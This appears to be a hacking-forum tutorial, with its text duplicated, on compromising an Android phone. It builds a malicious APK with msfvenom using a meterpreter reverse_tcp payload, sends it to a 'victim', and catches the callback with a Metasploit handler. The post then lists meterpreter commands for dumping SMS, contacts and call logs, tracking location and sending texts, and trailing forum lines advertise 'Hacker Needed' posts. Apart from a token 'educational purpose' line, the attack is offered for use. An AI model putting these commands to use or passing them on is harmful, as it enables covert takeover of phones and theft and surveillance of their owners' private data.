Android phones have a large share in smartphone market. So targeting android phone is very good option to hack. In this tutorial I will using KALI Linux as attacker PC and my Coolpad Note 3 as victim phone which I am going to hack.
Things We Need
Kali Linux installed.
An Android phone.
Brain
Lets Start
1. Open Kali terminal.
2. We will be going to use MSFVENOM to create a malicious apk file that we will install on the android phone.
3. Paste these commands in terminal .
4. Change the LHOST to you local IP address and press enter.
5. Now open the root folder and send the CyberSucks.apk to the victim.
6. Open new terminal and enter msfconsole
7. After opening metasploit console type these following commands
which are used to create payload handler which will create connection
between victim and kali PC.
Change the LHOST to your local ip address. Also don't close the
this terminal.
8. Wait until victim open the file.
9. After the victim open the file you will get a meterpreter session.
Now open the msfconsole terminal and use session -i 1command
to access the session.
10. In the meterpreter session you can use various commands that are
given below to play different types of tricks on the victim phone like
capturing a photo,screenshot,call logs,sms logs,sending a sms.
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Note:
Don't close the msfconsole terminal.
This is only for educational purpose.
Things We Need
Kali Linux installed.
An Android phone.
Brain
Lets Start
1. Open Kali terminal.
2. We will be going to use MSFVENOM to create a malicious apk file that we will install on the android phone.
3. Paste these commands in terminal .
- Code:
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > /root/CyberSucks.apk
4. Change the LHOST to you local IP address and press enter.
5. Now open the root folder and send the CyberSucks.apk to the victim.
6. Open new terminal and enter msfconsole
7. After opening metasploit console type these following commands
which are used to create payload handler which will create connection
between victim and kali PC.
- Code:
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
Change the LHOST to your local ip address. Also don't close the
this terminal.
8. Wait until victim open the file.
9. After the victim open the file you will get a meterpreter session.
Now open the msfconsole terminal and use session -i 1command
to access the session.
10. In the meterpreter session you can use various commands that are
given below to play different types of tricks on the victim phone like
capturing a photo,screenshot,call logs,sms logs,sending a sms.
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Note:
Don't close the msfconsole terminal.
This is only for educational purpose.
Sat Apr 29, 2017 10:50 am by ubedullah
» Group hackers
Sat Apr 15, 2017 2:37 pm by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 3:57 am by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 1:45 am by Group Hackers
» Hacker Needed
Thu Apr 13, 2017 11:10 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:07 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:21 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:06 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 1:35 am by Group Hackers